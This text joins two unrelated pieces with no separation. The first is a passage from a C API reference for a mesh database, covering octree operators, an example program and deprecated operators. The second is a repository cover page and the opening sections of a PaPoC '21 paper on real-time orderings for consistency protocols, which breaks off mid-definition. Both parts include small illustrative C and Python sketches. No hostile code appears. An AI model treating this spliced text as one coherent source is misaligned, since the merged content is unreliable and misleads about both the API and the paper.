**OC_numDown**
```c
int OC_numDown(pOctant)
```
Returns the number of octants in the tree below the given octant. The number returned does not include the given octant.
**OC_isTerminal**
```c
int OC_isTerminal(pOctant)
```
Returns 1 if the octant is a terminal octant, 0 otherwise.
**OC_bounds**
```c
void OC_bounds(pOctant octant, double min[3], double max[3])
```
Returns the coordinates of the two extreme corners of octant. min is the corner that has the minimum x, y and z values; max is the opposite corner.
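Given the corners returned by OC_bounds for a parent octant, any child's corners follow by halving each axis. The helper below is a hypothetical illustration, not part of the API; in particular, the bit convention used for the child index (bit 0 selects the upper x half, bit 1 the upper y half, bit 2 the upper z half) is an assumption for the example — the authoritative child numbering is the one shown in Figure 4.

```c
/* Compute the bounding corners of child octant n (0-7) from its parent's
 * corners. Assumed convention: bit 0 of n selects the upper x half, bit 1
 * the upper y half, bit 2 the upper z half. (The real numbering is the one
 * in Figure 4; adjust the bit mapping accordingly.) */
static void child_bounds(const double pmin[3], const double pmax[3],
                         int n, double cmin[3], double cmax[3])
{
    for (int axis = 0; axis < 3; axis++) {
        double mid = 0.5 * (pmin[axis] + pmax[axis]);
        if (n & (1 << axis)) {
            cmin[axis] = mid;
            cmax[axis] = pmax[axis];
        } else {
            cmin[axis] = pmin[axis];
            cmax[axis] = mid;
        }
    }
}
```

For a parent spanning [0,2]³, child 0 occupies the [0,1]³ corner and child 7 the [1,2]³ corner under this convention.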
**OC_origin**
```c
void OC_origin(pOctant octant, double origin[3])
```
Returns the origin of octant. origin is the coordinates of the point in the center of the octant.
**OC_numEnt**
```c
int OC_numEnt(pOctant)
```
Returns the number of mesh entities in a terminal octant. Returns -1 if the octant is not a terminal octant. The number of entities is the number of regions only in a solid mesh (i.e. the faces, edges, etc. are not included). In a shell mesh it is the number of faces. In a mixed solid/shell mesh it is the number of regions plus the number of "shell" faces.
**OC_setNumEnt**
```c
void OC_setNumEnt(pOctant, int n)
```
Sets the number of mesh entities that are in a terminal octant. The number of entities is the number of regions only in a solid mesh (i.e. the faces, edges, etc. should not be included). In a shell mesh it would be the number of faces. In a mixed solid/shell mesh it would be the number of regions plus the number of "shell" faces.
**OC_setEntity**
```c
void OC_setEntity(pOctant, pEntity ent, int n)
```
Sets ent to be the \( n^{th} \) mesh entity in the given terminal octant.
**OC_entity**
```c
pEntity OC_entity(pOctant octant, int n)
```
Returns the \( n^{th} \) mesh entity in octant. Returns null if octant is not terminal.
### 5.2 Octree Operators
**OT_new**
```c
pOctree *OT_new(pMesh mesh)
```
Creates a new octree object. mesh is the pMesh object that this octree is associated with. The mesh must have already been created and loaded before the octree is loaded using OT_load().
**OT_delete**
```c
void OT_delete(pOctree octree)
```
Deletes octree, including all of the octants in the octree.
**OT_load**
```c
void OT_load(pOctree, char *filename)
```
Loads an octree object from the file filename. The filename should be the full file name of the file that contains the octree information (including the .soc extension if there is one).
**OT_write**
```c
void OT_write(pOctree octree, char *filename, char *progname)
```
Writes octree to a file called filename (the extension that is used to denote this info is .soc; this extension must be passed as a part of filename). progname is a string containing the name of the program writing the file.
**OT_root**
```c
pOctant OT_root(pOctree)
```
Returns the root octant of the octree.
**OT_setOrigin**
```c
void OT_setOrigin(pOctree, double x, double y, double z)
```
Sets the origin of the octree to x,y,z.
**OT_setRoot**
```c
void OT_setRoot(pOctree, pOctant root)
```
Sets the root octant of the octree to root.
**OT_setSize**
```c
void OT_setSize(pOctree, double x, double y, double z)
```
Set the size of the octree (i.e. the size of the root octant) to x,y,z.
## 6.0 Example Code
This section provides code examples to demonstrate the use of the mesh database.
### 6.1 Example 1
This example code loops through all the regions in a mesh and prints out the classification of each vertex and the node numbers of all the nodes on each region.
```c
#include "MSops.h"
#include <stdio.h>
void printRegionInfo(pRegion region);
void main(void)
{
pMesh mesh;
pGModel model;
pRegion region;
int i;
long nr,nf,ne,nv,np;
void *temp=0;
MD_init(); /* initialize the mesh database */
model = GM_new(0); /* make a geometric model object */
mesh = MM_new(0,model); /* make a mesh object */
M_load(model,"test.smd"); /* load the model from the file test.smd */
M_load(mesh,"test.sms"); /* load the mesh from the file test.sms */
MM_makeNodes(mesh,MM_isoparametric);
nr = M_nRegion(mesh); /* get the number of regions, faces, edges, */
nf = M_nFace(mesh); /* and vertices in the mesh */
ne = M_nEdge(mesh);
nv = M_nVertex(mesh);
np = M_nPoint(mesh);
printf("Number of:\n\nRegions: %ld\nFaces: %ld\nEdges: %ld\nVertices: %ld\nPoints: %ld",nr,nf,ne,nv,np);
for(i=0; i<nr; i++) { /* loop through all the regions in the mesh */
region = M_nextRegion(mesh,&temp); /* temp=0 to get first region */
printRegionInfo(region); /* do something with the region */
}
M_delete(mesh); /* delete the mesh object (and all mesh entities) */
M_delete(model); /* delete the model object */
MD_exit(); /* close the mesh database */
}
void printRegionInfo(pRegion region)
{
int j,numface,size;
pFace face;
pList list;
pVertex vertex;
pNode node;
pEntity gent;
list = R_vertices(region); /* get a list of all the vertices on region */
for(j=0; j < PList_size(list); j++) {
/* loop over list */
vertex = PList_item(list,j); /* get the j'th vertex */
gent = V_whatsIn(vertex); /* get the classification of vertex */
printf("\tVertex %d: whatsIn: %d, type: %d, ",
j,MD_tag(gent),EN_type(gent));
node = EN_node(vertex,0); /* get node on vertex */
printf(" Node: %d\n",N_num(node)); /* get the node number */
}
printf("\n");
PList_delete(list); /* delete the list when we're done */
}
## 7.0 Deprecated Operators
These operators should not be used for any new code and old code using them should be updated to use other operators. These operators will be removed in a future version of the mesh database. The operators that should be used instead are given after Use:
**R_new**
```c
pRegion R_new(int type)
```
Creates a new pRegion based on type.
Use: **MM_createR**
**R_delete**
```c
void R_delete(pRegion region)
```
Deletes region. Does not remove the reference to the region on the faces that bound region. This operator should not be called if the region is part of a mesh (i.e. if it has been attached to a mesh using the M_addRegion operator). In this case the M_removeRegion operator should be called instead so that the mesh knows that the region has been deleted.
Use: **M_removeRegion**
**R_setNface**
```c
void R_setNface(pRegion region, int n)
```
Set the number of faces on region. This operator must be called after creating a region, before attaching any faces to the region.
Use: **MM_createR**
**R_setFace**
```c
void R_setFace(pRegion region, pFace face, int dir)
```
Attach face to region. dir is the direction that region is using the face; dir = 1 means that the face is being used such that its normal is pointed outside the region. This operator also sets face to point to region.
Use: **MM_createR**
**F_new**
```c
pFace F_new(eSubType type)
```
Create a new face of type type.
Use: **MM_createF**
**F_delete**
```c
void F_delete(pFace face)
```
Deletes face. Does not remove the reference to the face on the edges that bound the face. This operator should not be called if the face is part of a mesh (i.e. if it has been attached to a mesh using the M_addFace operator). In this case the M_removeFace operator should be called instead so that the mesh knows that the face has been deleted.
Use: **M_removeFace**
**F_setEdge**
```c
void F_setEdge(pFace face, pEdge edge, int dir)
```
Attach edge to face. dir is the direction that face is using edge. dir = 1 means that the edge is being used in the direction that it was defined, from the first vertex to the second vertex of the edge. Edges must be added to the face in the direction of the loop that defines the face.
Use: **MM_createF**
**F_setNedge**
```c
void F_setNedge(pFace face, int n)
```
Set the number of edges on face. It is not necessary to call this operator for dynamic faces (it will do nothing in that case). For static faces this operator must be called before attaching edges to the face.
Use: **MM_createF**
**E_new**
```c
pEdge E_new(eSubType type)
```
Creates a new edge of type type.
Use: **MM_createE**
**E_delete**
```c
void E_delete(pEdge edge)
```
Deletes edge. Does not remove the reference to the edge on the vertices on the edge. This operator should not be called if the edge is part of a mesh (i.e. if it has been attached to a mesh using the M_addEdge operator). In this case the M_removeEdge operator should be called instead so that the mesh knows that the edge has been deleted.
Use: **M_removeEdge**
**E_setVertex**
```c
void E_setVertex(pEdge edge, pVertex vertex1, pVertex vertex2)
```
Sets the vertices on edge to vertex1 and vertex2. The positive direction of the edge is taken to be from vertex1 to vertex2.
Use: **MM_createE**
**E_setNface**
```c
void E_setNface(pEdge edge, int n)
```
Sets the number of faces using edge. It is not necessary to call this operator for a dynamic edge (it will do nothing in that situation). For a static edge this operator must be called before the edge is used in any face definitions.
Use: No longer needed
**V_new**
```c
pVertex V_new(eSubType type)
```
Create a new vertex of type type.
**V_delete**
```c
void V_delete(pVertex vertex)
```
Deletes vertex. This operator should not be called if the vertex is part of a mesh (i.e. if it has been attached to a mesh using the M_addVertex operator). In this case the M_removeVertex operator should be called instead so that the mesh knows that the vertex has been deleted.
**V_setNedge**
```c
void V_setNedge(pVertex vertex, int n)
```
Set the number of edges using vertex to n. This operator does not need to be called for dynamic vertices; it must be called for static vertices before the vertex is used to define any edges.
**M_addRegion**
```c
void M_addRegion(pModel model, pRegion region)
```
**M_addFace**
```c
void M_addFace(pModel model, pFace region)
```
**M_addEdge**
```c
void M_addEdge(pModel model, pEdge region)
```
**M_addVertex**
```c
void M_addVertex(pModel model, pVertex region)
```
**M_addPoint**
```c
void M_addPoint(pModel model, pPoint region)
```
Adds the appropriate entity to the model. This operator just registers that the given entity is a part of the model; it does not affect any of the information about that entity.
Use: **MM_createR**, **MM_createF**, **MM_createE**, **MM_createVP** - these automatically add the newly created entity to the mesh, so no call is needed.
Towards the Synthesis of Coherence/Replication Protocols from Consistency Models via Real-Time Orderings
Citation for published version:
Digital Object Identifier (DOI):
10.1145/3447865.3457964
Link:
Link to publication record in Edinburgh Research Explorer
Document Version:
Peer reviewed version
Published In:
Proceedings of the 8th Workshop on Principles and Practice of Consistency for Distributed Data (PaPoC '21)
General rights
Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights.
Take down policy
The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim.
Towards the Synthesis of Coherence/Replication Protocols from Consistency Models via Real-Time Orderings
Vasilis Gavrilatos, Vijay Nagarajan, Panagiota Fatourou*
The University of Edinburgh, * University of Crete & FORTH-ICS
FirstName.LastName@ed.ac.uk, * faturu@csd.uoc.gr
Abstract
This work focuses on shared memory systems with a read-write interface (e.g., distributed datastores or multiprocessors). At the heart of such systems resides a protocol responsible for enforcing their consistency guarantees. Designing a protocol that correctly and efficiently enforces consistency is a very challenging task. Our overarching vision is to automate this task. In this work we take a step towards this vision by establishing the theoretical foundation necessary to automatically infer a protocol from a consistency specification. Specifically, we propose a set of mathematical abstractions, called real-time orderings (rt-orderings), that model the protocol. We then create a mapping from consistency guarantees to the minimal rt-orderings that enforce the guarantees. Finally, we informally relate the rt-orderings to protocol implementation techniques. Consequently, rt-orderings serve as an intermediate abstraction between consistency and protocol design, that enables the automatic translation of consistency guarantees into protocol implementations.
CCS Concepts • Computer systems organization → Cloud computing; Multicore architectures; • Software and its engineering → Consistency.
Keywords Consistency; Coherence; Replication; Synthesis;
1 Introduction
This work focuses on “shared memory” systems that provide a read/write interface to the programmer. Such systems are ubiquitous in both computer architecture and distributed systems. Prominent examples include shared memory multiprocessors (SMPs), GPUs, NoSQL Databases [1], coordination services[9], and software-based DSMs [10].
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org.
PaPoC’21, April 26, 2021, Online, United Kingdom © 2021 Association for Computing Machinery. ACM ISBN 978-1-4503-8338-7/21/04... $15.00 https://doi.org/10.1145/3447865.3457964
Figure 1: a) The producer-consumer synchronization pattern mandates that if P2 reads P1’s write to y, then it must also read P1’s write to x. b) The independent-reads independent-writes (IRIW) pattern mandates that if P2 sees P1’s writes but not P3’s and P4 sees P3’s write, then P4 must see P1’s write.
Such systems commonly replicate data – sometimes for performance (through caching), sometimes for fault tolerance and sometimes for both. To enable reasoning in the presence of replication, a memory consistency model (MCM) is specified as part of the system’s interface, providing the rules that dictate what values a read can return. In order to enforce the MCM, the system deploys a protocol which ensures that the replicas behave in accordance with the MCM. This protocol is called coherence protocol in computer architecture and replication protocol in distributed systems. We simply refer to it as the protocol.
The MCM specifies the behaviour of the system when executing parallel programs by enumerating all patterns through which parallel programs can synchronize. For example, an MCM CMa can guarantee the synchronization pattern of Figure 1a (commonly known as “producer-consumer”). Specifically, in Figure 1a, process P1 writes object x and then y, while process P2 reads y and then x. CMa guarantees that if P2’s read to y returns the write of P1, then P2’s read to x will also return the write of P1 (i.e., x = 1).
The MCM is thus a contract between the programmers and the designers. While programmers must understand the behaviour of the system, the designers must understand how to implement that behaviour. Problematically, enforcing the MCM is very challenging. For instance, consider two well known MCMs: TSO [18] and Causal Consistency (CC) [19]. TSO enforces both Figure 1a and b while CC enforces Figure 1a but not b. Given this information, how is the designer to implement a correct and efficient protocol for either MCM? Crucially, how is the designer to differentiate between the two models? E.g., how can one exploit that Figure 1b need not be enforced in the CC protocol?
Our overarching vision is to automate the above task: given a target MCM we envision a software tool that can produce an efficient protocol. We argue that to create this tool we need one additional level of abstraction which can act as an intermediary between the MCM and the protocol. That is: (1) we must be able to automatically translate any MCM to this abstraction; and (2) we must also be able to map the abstraction itself into protocol design choices. In this work, we take a step towards actualizing our vision, by proposing such an abstraction and, most crucially, presenting the mapping from MCMs to this abstraction. We also informally relate the abstraction to protocol design choices.
To create this abstraction, we observe that a shared memory system, be it a multiprocessor or a geo-replicated Key-Value Store (KVS), can be abstracted through the model of Figure 2, which depicts a set of processes executing a parallel program. Each process inserts its memory operations to a structure we call the reorder buffer (ROB), allocating one ROB entry per operation. The memory system executes the operations it finds in the ROB and writes back the response of each operation in-place in its dedicated entry.
A process models a client of a KVS or a core of a multiprocessor. The ROB abstracts the core’s load-store queue or a software queue that a KVS must maintain to keep track of incoming requests. The memory system is modelled as a distributed system comprising a set of nodes, where each node contains a controller and a memory. The nodes model the private caches of the multiprocessor or the geo-replicated memory servers of the KVS. Finally the network of the memory system can be thought of as the Network-on-Chip or as the WAN.
We observe that protocols of real systems enforce various consistency models using two widgets: 1) the ROB that allows for the reordering of operations; and 2) the memory system which determines how a read or a write executes, i.e., how it propagates to each of the replicas. We propose two sets of mathematical rules to abstract protocols, one that can abstract the reorderings of the ROB and one that can abstract the propagation rules of the memory system.
Specifically, we model the ROB using four rules named program-order real-time orderings (prt-orderings). The \( \text{prt}_{\text{wr}} \) prt-ordering mandates that when write \( w \) precedes read \( r \) in a program execution, then \( r \) can begin executing in the memory system only after \( w \) has completed. Similarly, we define \( \text{prt}_{\text{rw}}, \text{prt}_{\text{rr}}, \text{prt}_{\text{ww}} \) for the rest of the combinations between reads and writes. To summarize, we model an ROB by specifying the subset of the four prt-orderings it enforces.
We model the memory system using four rules named synchronization real-time orderings (srt-orderings). The \( \text{srt}_{\text{wr}} \) srt-ordering mandates that if write \( w \) to object \( x \) completes before read \( r \) to object \( x \) in real time, then \( r \) must observe \( w \). Similarly, we define \( \text{srt}_{\text{rw}}, \text{srt}_{\text{rr}}, \text{srt}_{\text{ww}} \). To summarize, we model a memory system by specifying the subset of the four srt-orderings it enforces.
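One way to make the \( \text{srt}_{\text{wr}} \) rule concrete is a checker over a finite timestamped history: if a write to x completed before a read of x began, the read must not return a write that itself completed before that write began. The operation record and the exact violation condition below are our own modeling choices for illustration, not the paper's formal definitions.

```c
#include <stdbool.h>

typedef struct {
    double begin, end; /* real-time interval of the operation */
    int obj;           /* object written or read */
    int wid;           /* for a write: its id; for a read: id of the write it returned */
    bool is_write;
} Op;

/* Check srt_wr over a finite history: a read must not return a write that
 * completed before some same-object write that itself completed before the
 * read began. (One possible operationalization of "r must observe w".) */
static bool check_srt_wr(const Op *h, int n)
{
    for (int i = 0; i < n; i++) {
        if (h[i].is_write) continue;
        const Op *r = &h[i];
        const Op *ret = 0; /* the write whose value r returned */
        for (int j = 0; j < n; j++)
            if (h[j].is_write && h[j].obj == r->obj && h[j].wid == r->wid)
                ret = &h[j];
        if (!ret) continue;
        for (int j = 0; j < n; j++) {
            const Op *w = &h[j];
            if (w->is_write && w->obj == r->obj &&
                w->end < r->begin &&  /* w completed before r began... */
                ret->end < w->begin)  /* ...yet r returned an older write */
                return false;
        }
    }
    return true;
}
```

For example, if a write w2 to x completes at time 3 and a read of x begins at time 4 but returns an earlier write w1 that completed before w2 began, the checker reports a violation of \( \text{srt}_{\text{wr}} \).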
We refer to prt-orderings and srt-orderings as real-time orderings (rt-orderings). The eight rt-orderings comprise our designer-centric intermediate abstraction of the protocol.
While the rt-orderings have been employed by other works in the past to model consistency models or protocols (§9), this work is the first to present a mapping from MCMs to the rt-orderings. That is, given any MCM, we provide the set of minimal rt-orderings that enforce it. Crucially, this mapping, along with relating the rt-orderings with protocol implementation techniques, pave the way for automating protocol design.
Using this mapping from MCMs to rt-orderings, we now revisit the questions we posed on Figure 1. Specifically, prt-orderings \( \text{prt}_{\text{ww}} \) and \( \text{prt}_{\text{rr}} \) and the srt-ordering \( \text{srt}_{\text{wr}} \) suffice to enforce the producer-consumer pattern (discussed in Section 5.4). Informally, \( \text{prt}_{\text{ww}} \) mandates that writes from the same process must be executed in the order intended by the program; \( \text{prt}_{\text{rr}} \) mandates the same for reads; \( \text{srt}_{\text{wr}} \) mandates that a read must be able to return the value of the latest completed write (from any process). To also enforce the IRIW pattern, \( \text{srt}_{\text{rr}} \) is required (discussed in Section 5.5). Informally, \( \text{srt}_{\text{rr}} \) mandates that if a read returns the value of write \( w \), then any later read must also be able to return the value of write \( w \).
**Contributions.** In summary, in this work we make the following contributions:
- We propose and formalize eight rt-orderings for mathematically modelling consistency enforcement protocols, serving as an intermediate abstraction between the MCM and the protocol implementation (§3).
- We create a mapping from MCMs to rt-orderings, specifying the minimal set of rt-orderings sufficient to enforce any MCM (§5) and vice versa, specifying the MCM enforced by any set of rt-orderings (§6).
- We informally map rt-orderings to protocol implementation techniques (§7).
2 Preliminaries
In this section, we first establish the system model, then we describe the notation we will use throughout the paper and finally we discuss how executions are modeled.
2.1 System Model
Figure 2 illustrates our system model. Specifically, there is a set of P processes, each of which executes a program and there is a protocol which enforces the MCM. The protocol is comprised of a set of reorder buffers (ROBs) and the memory system. The memory system stores a set X of shared objects, each of a unique name and value. A memory operation (or simply operation) can be either a read or a write of an object. A read returns a value and a write overwrites the value of the object and returns an ack.
ROBs. The ROBs are used to facilitate communication between the processes and the protocol. There are three events in the lifetime of an operation within the ROB: issuing, begin and completion. Specifically, we write that a process “issues an operation”, when the operation is first inserted in the ROB. A process pushes operations in the ROB in the order that they are encountered within its program. We refer to this order as the program order. Furthermore, we write that “an operation begins” when the memory system begins executing the operation. In this case the memory system marks the operation’s ROB entry as begun. Similarly, we write that “an operation completes” when the memory system has finished executing the operation. In this case, the memory system marks the operation’s ROB entry as completed (and writes back the result if it is a read).
Notably, a process can use the value returned by a read, as soon as the read is marked completed by the memory system, irrespective of whether preceding operations are completed. An operation is removed from the ROB, if all three conditions hold: 1) it is the oldest operation, 2) it is completed and 3) the process has consumed its value, if it is a read.
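The ROB lifecycle above can be made concrete with a small sketch. The following Python class is our own illustration (names such as `issue` and `retire` are ours, not part of the model); it tracks the begun/completed/consumed flags and applies the three removal conditions:

```python
from collections import deque

class ROB:
    """Toy reorder buffer: operations are issued in program order and removed
    only when oldest, completed, and (for reads) consumed."""
    def __init__(self):
        self.entries = deque()  # each entry: op, is_read, begun, completed, consumed

    def issue(self, op, is_read):
        # The process pushes operations into the ROB in program order.
        self.entries.append({"op": op, "is_read": is_read,
                             "begun": False, "completed": False, "consumed": False})

    def begin(self, op):
        # The memory system marks the entry as begun.
        self._find(op)["begun"] = True

    def complete(self, op):
        # The memory system marks the entry as completed
        # (and writes back the value if it is a read).
        self._find(op)["completed"] = True

    def consume(self, op):
        # The process may use a read's value as soon as it is completed,
        # irrespective of older, still-pending operations.
        entry = self._find(op)
        assert entry["completed"]
        entry["consumed"] = True

    def retire(self):
        # Remove the oldest operation if it is completed and, if a read, consumed.
        while self.entries:
            head = self.entries[0]
            if head["completed"] and (not head["is_read"] or head["consumed"]):
                self.entries.popleft()
            else:
                break

    def _find(self, op):
        return next(e for e in self.entries if e["op"] == op)
```

Note that `consume` is legal on a completed read even while an older write is still pending, mirroring the remark above; the read is nevertheless only removed once it reaches the head of the buffer.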
Memory system. We model the memory system as a distributed system comprised of a set of nodes, where each node contains a controller and a memory. Furthermore, each node is connected to one ROB, from which it reads the operations that must be executed. The controller of each node is responsible for the execution of the operations. The memory of each node stores every object in X.
2.2 Notation
The notation used throughout this paper is the one used by Alglave et al. [2]. We repeat it here for completeness. The notation is based on relations. Specifically, we will denote the transitive closure of r with r∗ and the composition of r1, r2 with r1;r2. We say that r is acyclic if its transitive closure is irreflexive and we denote by writing acyclic(r). Finally, we say that r is a partial order, when r is transitive and irreflexive.
We say that a partial order r is a total order over a set S, if for every x, y in S, it is that (x, y) ∈ r ∨ (y, x) ∈ r.
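These relational notions translate directly into code. As a sketch (with our own helper names), a relation can be represented as a set of ordered pairs:

```python
def compose(r1, r2):
    """Relational composition r1;r2: contains (a, c) iff (a, b) in r1 and (b, c) in r2."""
    return {(a, c) for (a, b) in r1 for (b2, c) in r2 if b == b2}

def transitive_closure(r):
    """r*: repeated composition until a fixpoint is reached."""
    closure = set(r)
    while True:
        extended = closure | compose(closure, closure)
        if extended == closure:
            return closure
        closure = extended

def acyclic(r):
    """r is acyclic iff its transitive closure is irreflexive."""
    return all(a != b for (a, b) in transitive_closure(r))

def total_over(r, s):
    """A partial order r is total over s iff it relates every distinct pair."""
    return all((x, y) in r or (y, x) in r
               for x in s for y in s if x != y)
```

For instance, `{(1, 2), (2, 1)}` is cyclic because its closure contains `(1, 1)`.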
We use small letters to refer to memory operations (e.g., a, b, c etc.). In figures that show executions (e.g., Figure 3), we denote a write with Wx = val, where x is the object to be written and val is the new value. Similarly, a read is represented as Rx = val, where val is the value returned. When required, relations between operations are denoted with red arrows in the figures.
2.3 Modelling executions
To model executions, we use the framework created by Alglave et al. [2], introducing minor changes where necessary. Specifically, we model an execution as a tuple \( (M, po, rf, hb, RL) \). M is the set of memory operations included in the execution, po, rf and hb are relations over the operations and RL is a set of relations rl over the operations.
Execution relations (po, rf, hb and rl). The program order po relation is a total order over the operations issued by a single process, specifying the order in which memory operations appear in the program executed by the process; operations are issued by the process in this order. Only operations from the same process are ordered: for two operations a, b from process i ∈ P, if a is issued before b then (a, b) ∈ po.
The reads-from rf relation contains a pair for each read operation in M, relating it with a write on the same object. For the pair (a, b) ∈ rf, it must be that b is a read that returns the value created by the write a, i.e., b reads-from a.
The happens-before hb relation is a partial order over all operations, specifying the real-time relation of operations. Specifically, for two operations a, b, if (a, b) ∈ hb, then that means that a completes before b begins.
Finally, the read-legal rl relation is a total order over all operations, with the restriction that acyclic(rl ∪ rf). Given the rf of an execution E, it is often possible to construct more than one rl. We associate each execution E, with a set RL which contains every rl that can be constructed from E. For each rl ∈ RL, we derive the following relations.
Relations derived from rl (ws, fr, syn). The write-serialization ws relation is a total order of writes to the same object that can be derived from rl, such that ws ⊆ rl. Intuitively, ws captures the order in which writes to the same object serialize.
The from-reads fr relation connects a read to the writes on the same object that follow the read in rl. Specifically, for every read a and every write b to the same object where (a, b) ∈ rl, it holds that (a, b) ∈ fr. It follows that fr ⊆ rl.
Finally, the synchronization syn relation combines the rf, fr and ws relations. Specifically, syn is a partial order over operations on the same object defined as the transitive closure of the union of rf, ws and fr, i.e., syn ≜ (rf ∪ ws ∪ fr)∗.
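Given an execution’s rl (as a list) and rf, the derived relations can be computed mechanically. The sketch below is our own illustration; it assumes each operation is tagged with its kind ('W' or 'R') and its object, and that rf pairs are (write, read):

```python
def derive_relations(ops, rl, rf):
    """ops maps each operation name to (kind, obj), kind in {'W', 'R'};
    rl is the read-legal total order given as a list; rf is a set of
    (write, read) pairs. Returns the derived ws, fr and syn relations."""
    pos = {op: i for i, op in enumerate(rl)}
    kind = {op: ops[op][0] for op in ops}
    obj = {op: ops[op][1] for op in ops}

    # ws: writes to the same object, ordered as in rl (ws is a subset of rl).
    ws = {(a, b) for a in ops for b in ops
          if kind[a] == kind[b] == 'W' and obj[a] == obj[b] and pos[a] < pos[b]}

    # fr: a read followed in rl by a write to the same object.
    fr = {(a, b) for a in ops for b in ops
          if kind[a] == 'R' and kind[b] == 'W' and obj[a] == obj[b] and pos[a] < pos[b]}

    # syn = (rf ∪ ws ∪ fr)*: transitive closure of the union.
    syn = set(rf) | ws | fr
    while True:
        extra = {(a, c) for (a, b) in syn for (b2, c) in syn if b == b2}
        if extra <= syn:
            return ws, fr, syn
        syn |= extra
```

With `rl = ['w1', 'r1', 'w2']` on a single object, `ws` orders `w1` before `w2` and `fr` relates `r1` to the later write `w2`.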
Relation types (Table 2). We partition \( po \) based on the types (read or write) of the related operations into four \( po \)-type relations: \( po_{ww}, po_{wr}, po_{rr}, po_{rw} \). For instance, \( po_{wr} \) contains every \( po \) pair whose first operation is a write and whose second operation is a read. We write \( po \) as a placeholder for the four \( po \)-type relations; every pair in \( po \) is also in one of the \( po \)-type relations, i.e.,
\[
po \triangleq po_{ww} \cup po_{wr} \cup po_{rr} \cup po_{rw}
\]
Similarly, we define \( syn_{wr} \) and \( syn_{rr} \). Note that we do not need to define \( syn_{ww} \) and \( syn_{rw} \), because they would be the same as \( ws \) and \( fr \), respectively. We write \( syn \) as a placeholder for \( ws, syn_{wr}, syn_{rr}, fr \). We note that every pair in \( syn \) is also in one of the \( syn \)-type relations and that \( rf \) is a subset of \( syn_{wr} \).
\[
syn \triangleq ws \cup syn_{wr} \cup syn_{rr} \cup fr
\]
Finally, in the same spirit, we define the \( hb\)-type relations: \( hb_{ww}, hb_{wr}, hb_{rr}, hb_{rw} \).
3 Real-time orderings
In this section we introduce and formally define the real-time orderings (rt-orderings), through which we model the protocol. There are two types of rt-orderings: the program-order real-time orderings (prt-orderings) through which we model the operation of the ROB and the synchronization real-time orderings (srt-orderings), through which we model the operation of the memory system. Table 1 provides the definition of each of the eight real-time orderings. Below we first describe the prt-orderings and then the srt-orderings.
3.1 Program-order Real-time Orderings
An execution \( E(M, po, rf, hb, RL) \) is said to enforce the \( prt_{wr} \) if:
\[
\forall w, r \in M \text{ s.t. } (w, r) \in po_{wr} \rightarrow (w, r) \in hb_{wr}
\]
Plainly, a read \( r \) cannot begin before all writes that precede it in program order have completed. Table 1 extends this definition to write-write, read-read and read-write pairs. When all four prt-orderings are enforced then it follows that \( po \subseteq hb \).
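Checking a prt-ordering over a finite execution is a subset test, as the definition suggests. A minimal sketch (our own helper, assuming `kind` maps each operation to 'W' or 'R', and relations are sets of pairs):

```python
def enforced_prt(po, hb, kind, pair):
    """prt_mn holds iff every po pair of kinds (m, n) is also in hb.
    pair is e.g. ('W', 'R') for prt_wr."""
    m, n = pair
    po_mn = {(a, b) for (a, b) in po if kind[a] == m and kind[b] == n}
    return po_mn <= hb
```

Checking all four pairs amounts to the overall \( po \subseteq hb \) test mentioned above.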
3.2 Synchronization Real-time Orderings
The synchronization real-time orderings (srt-orderings) are constraints over operations to the same object. There are four srt-orderings: \( srt_{ww}, srt_{wr}, srt_{rr}, srt_{rw} \). An execution \( E(M, po, rf, hb, RL) \) enforces the srt-ordering \( srt_{wr} \) if there exists \( rl \in RL \) such that:
\[
acyclic(hb_{wr} \cup syn)
\]
In other words the \( srt_{wr} \) mandates that for a write \( a \) and a read \( b \) if \((a, b) \in hb_{wr}\), then it must be that \((b, a) \notin syn\).
Table 1: The condition required to enforce each rt-ordering.
<table>
<thead>
<tr>
<th>prt-orderings</th>
<th>srt-orderings</th>
</tr>
</thead>
<tbody>
<tr>
<td>\( prt_{ww} \): \( po_{ww} \subseteq hb_{ww} \)</td>
<td>\( srt_{ww} \): \( acyclic(hb_{ww} \cup syn) \)</td>
</tr>
<tr>
<td>\( prt_{wr} \): \( po_{wr} \subseteq hb_{wr} \)</td>
<td>\( srt_{wr} \): \( acyclic(hb_{wr} \cup syn) \)</td>
</tr>
<tr>
<td>\( prt_{rr} \): \( po_{rr} \subseteq hb_{rr} \)</td>
<td>\( srt_{rr} \): \( acyclic(hb_{rr} \cup syn) \)</td>
</tr>
<tr>
<td>\( prt_{rw} \): \( po_{rw} \subseteq hb_{rw} \)</td>
<td>\( srt_{rw} \): \( acyclic(hb_{rw} \cup syn) \)</td>
</tr>
</tbody>
</table>
Table 2: The types of po, syn and hb relations
<table>
<thead>
<tr>
<th>po-type</th>
<th>syn-type</th>
<th>hb-type</th>
</tr>
</thead>
<tbody>
<tr>
<td>\( po_{ww} \)</td>
<td>\( ws \)</td>
<td>\( hb_{ww} \)</td>
</tr>
<tr>
<td>\( po_{wr} \)</td>
<td>\( syn_{wr} \)</td>
<td>\( hb_{wr} \)</td>
</tr>
<tr>
<td>\( po_{rr} \)</td>
<td>\( syn_{rr} \)</td>
<td>\( hb_{rr} \)</td>
</tr>
<tr>
<td>\( po_{rw} \)</td>
<td>\( fr \)</td>
<td>\( hb_{rw} \)</td>
</tr>
</tbody>
</table>
4 Memory consistency models (MCMs)
In order to create a mapping from memory consistency models (MCMs) to the rt-orderings, we need to establish a formalism for the MCMs. In this section, we use the formalism of Alglave et al. [2] to describe synchronization patterns (sync-pats) and assert that any MCM \( CM \) is defined as a set of sync-pats \( S_{CM} \). An execution enforces \( CM \) if it enforces every sync-pat in \( S_{CM} \). Below we define what a sync-pat is and what its enforcement entails.
A sync-pat is a path between two operations to the same object. The path can be constructed through any composition of \( po\)-type and \( syn\)-type relations, with the only restriction being that at least one \( po\)-type must be included (explained in the remarks below). Table 2 describes which relations are denoted \( po\)-type and \( syn\)-type.
For example, consider the sync-pat \( s \) that consists of a \( po_{wr} \) relation, then an \( fr \) relation and then a \( po_{wr} \) (depicted in Figure 3a). We can describe \( s \) by composing the three relations as follows:
\[
s \triangleq po_{wr}; fr; po_{wr}
\]
